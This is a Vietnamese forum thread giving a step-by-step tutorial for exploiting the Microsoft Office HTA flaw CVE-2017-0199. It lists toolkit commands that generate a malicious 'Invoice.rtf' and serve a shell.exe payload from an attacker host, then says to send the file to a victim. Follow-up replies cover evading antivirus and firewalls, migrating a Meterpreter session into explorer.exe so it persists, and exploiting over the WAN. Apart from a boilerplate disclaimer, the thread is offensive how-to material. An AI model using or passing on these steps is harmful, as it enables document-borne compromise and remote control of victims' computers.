Khai thác lỗ hổng HTA (CVE-2017-0199) trong Microsoft Office

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Khai thác lỗ hổng HTA (CVE-2017-0199) trong Microsoft Office
Trong những ngày trung tuần tháng 4, một trong ba lỗ hổng ảnh hướng tới gần như tất cả các phiên bản của microsoft office word đã được công bố. Lỗi hổng này đã được gán tới cơ sở dữ liệu lỗ hổng là CVE-2017-0199. Lỗ hổng này cho phép kẻ xấu thực hiện bất kỳ một remote code nào thông qua một file văn bản độc hại.

audit_Pentest.png

Các phiên bản bị ảnh hương bao gồm "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1".

Bài viết này mình sẽ hướng dẫn các bạn cách khai thác lỗ hổng này.
  • Tải công cụ khai thác tại đây.Tạo ra một file văn bản với lệnh
    python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x
  • Bật sever listener khai thác với lệnh
    python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
  • Gửi file văn bản đã được tạo ra ở bước 2. Nếu nạn nhân mở file này, khai thác sẽ được thực thi.
 
Chỉnh sửa lần cuối bởi người điều hành:
Chào anh
Em đọc nhiều bài của anh rất chi là hay, có cả video nữa, hì.
Anh ơi, nếu máy nạn nhân có cài Zone ALARM (một ứng dụng tường lửa), khi mở file rtf, nếu mã độc từ máy nạn nhân kết nối đến Máy hacker (x.x.x.x) thì ZoneAlarm sẽ cảnh báo nạn nhân là có kết nối tới IP x.x.x.x, khi đó người dùng sẽ block lại, lúc đó làm sao mà khai thác được nhỉ???
Anh có thể thử cài ZoneAlarm (hoặc Kaspersky Firewall) lên máy nạn nhân và test thử, sau đó quay video up lên cho em xem được không?
Em hâm mộ anh lắm đó!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: QUANG28
Comment
Chào anh
Em đọc nhiều bài của anh rất chi là hay, có cả video nữa, hì.
Anh ơi, nếu máy nạn nhân có cài Zone ALARM (một ứng dụng tường lửa), khi mở file rtf, nếu mã độc từ máy nạn nhân kết nối đến Máy hacker (x.x.x.x) thì ZoneAlarm sẽ cảnh báo nạn nhân là có kết nối tới IP x.x.x.x, khi đó người dùng sẽ block lại, lúc đó làm sao mà khai thác được nhỉ???
Anh có thể thử cài ZoneAlarm (hoặc Kaspersky Firewall) lên máy nạn nhân và test thử, sau đó quay video up lên cho em xem được không?
Em hâm mộ anh lắm đó!
Hiện nay, tác giả của công cụ đã cập nhật công cụ này lên version 3. Sử dụng một vài kỹ thuật để vượt qua cơ chế kiểm soát của các phần mềm diệt virus, firewall. Bạn tải tại đây nhé.

Invoice_Obfuscated.jpeg
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: opter
Comment
nếu victim thoát hẳn file word thì có khai thác được không bạn?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
nếu victim thoát hẳn file word thì có khai thác được không bạn?
Khi victim chạy file word và bạn đã có một meterpreter session, để tránh tình trạng khi nạn nhân thoát tiến trình microsoft word, bạn dùng lệnh "migrate" trong metasploit nhé. Mục đích của migrate là inject dll vào một tiến trình khác đang hoạt động như explorer.exe (tiến trình này luôn hoạt động cùng hệ thống) giúp cho meterpreter không bị mất khi victim thoát khỏi phần mềm đang bị khai thác.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: blackarch
Comment
Bác DDos ơi sao bản của em ko dùng được lệnh "migrate", bác hướng dẫn em với, thanks
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
cái này chỉ tấn công máy trong cùng mạng lan hả bạn
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
lỗi này ngoài mạng LAN vẫn bị khai thác bạn nhé!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mình làm theo video nhưng đến bước cuối không nhận được:Received request for payload from 192.168.0.16. Nên không mở shell được. Chỉ nhận được: Received GET method from 192.168.0.16. ai biết lỗi ở đâu, làm ơn chỉ với ak
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mình làm theo video nhưng đến bước cuối không nhận được:Received request for payload from 192.168.0.16. Nên không mở shell được. Chỉ nhận được: Received GET method from 192.168.0.16. ai biết lỗi ở đâu, làm ơn chỉ với ak
Có thể bản office của bạn đã được vá...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mình đang thử trên bản word 2010 bản professional.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
cái trang nó dùng để viết lệnh là cmd hả anh
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
  1. Tạo ra một file văn bản với lệnh
    python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
  2. văn bản ở đâu anh office word ạ
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
port khai thác mặc định là 80 , có thể đổi thành port khác để nat và khai thác qua wan
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
cve-2017-0199 hta lỗ hổng microsoft office
Bên trên